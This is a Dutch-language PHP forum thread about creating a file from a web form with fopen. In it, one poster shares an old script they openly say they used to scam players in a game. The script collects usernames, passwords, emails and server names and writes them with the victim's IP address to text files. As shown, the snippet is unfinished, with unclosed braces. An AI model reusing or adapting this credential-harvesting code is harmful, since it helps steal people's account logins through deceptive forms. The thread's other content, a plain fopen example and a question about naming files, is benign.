je kan dat makkelijk maken in OOP (zoek hier en anders op www.phpfreakz.nl )
en een programma dat webprogramma's beveiligd heb ik wel voor je. maar dan moeten we ff kijken hoe k dat aan je ga geven.. >.>
(een soort website scambler, zet alles om in onleesbare javascript codes, of beveiligt webpagina's met wachtwoorden.)
k, ik heb geprobeert een oop te maken, maar ik stuit op een probleem, hoe laat ik php saven, niet schrijven, niet bewerken, maar gewoon 1 bestand aanmaken
beveiligen hoeft niet omdat ik hem offline zal gebruiken ^^
even snel een voorbeeldje:
(moet je hem zelf maar verwerken in je script - dit is een oud scriptje dat ik gebruikte om mensen in een spelletje te scammen, ik liet ze dingen invullen en het werd allemaal netjes opgeslagen. blablabla, wel mazzel dat k hem nog heb want anders had ik deze post niet geschreven.)
<?php
if (isset($_POST["username"])) {
$username = $_POST["username"];
$password = $_POST["password"];
$cpassword = $_POST["cpassword"];
$email = $_POST["email"];
$server = $_POST["server"];
//Was a field left blank?
if($username==NULL|$password==NULL|$cpassword==NULL|$email==NULL|$server==NULL) {
echo "One or more fields was left blank. Please fill in all your files carefully. <a href='2.php'>go back</a>";
}else{
//Do the passwords match?
if($password!=$cpassword) {
echo "Passwords do not match";
}else if ($server=="-") {
//Is server bad ?
echo "Please select a correct server. <a href='2.php'>go back</a>";
}else{
//Everything seems good, lets save
$file = "lal/".$server." - ".rand(1,99999)." - ".$_SERVER['REMOTE_ADDR'].".txt"; // lal = submap waarin ie word opgeslagen
$fp= fopen($file,"w");
rewind($fp);
fwrite($fp,"Username: ");
fwrite($fp,$username);
fwrite($fp," - ");
fwrite($fp,"Password: ");
fwrite($fp,$password);
fwrite($fp," - ");
fwrite($fp,"Server: ");
fwrite($fp,$server);
fwrite($fp," - ");
fwrite($fp,"Email: ");
fwrite($fp,$email);
//oftwewel, hier doe je de input, je kan ook alles in een string stoppen denk ik
//Ohja, je kan hier wel \n gebruiken maar dat werkt niet, want dan geeft ie de ascii code ipv regeleinde. ( is makkelijker voor je overzicht later.)
//ik ben vast nog dingen vergeten, maar anders voeg je me maar even toe op msn ofzo. (of vraag je andere mensen om hulp.)
fclose($fp);
?>
Een bestand aanmaken kun je ook doen met de functie fopen() geef dan de parameter 'w' mee. Om bijvoorbeeld de pagina test.php aan te maken:
<?php
$handle = fopen('test.php', 'w');
fclose($handle);
?>
Titel voor test00 invoeren via een html-pagina (via browser)
kortom, naam "XX" in tekstveld type, op knop drukken en een bestand erbij hebben genaamd "XX(.html of .php)"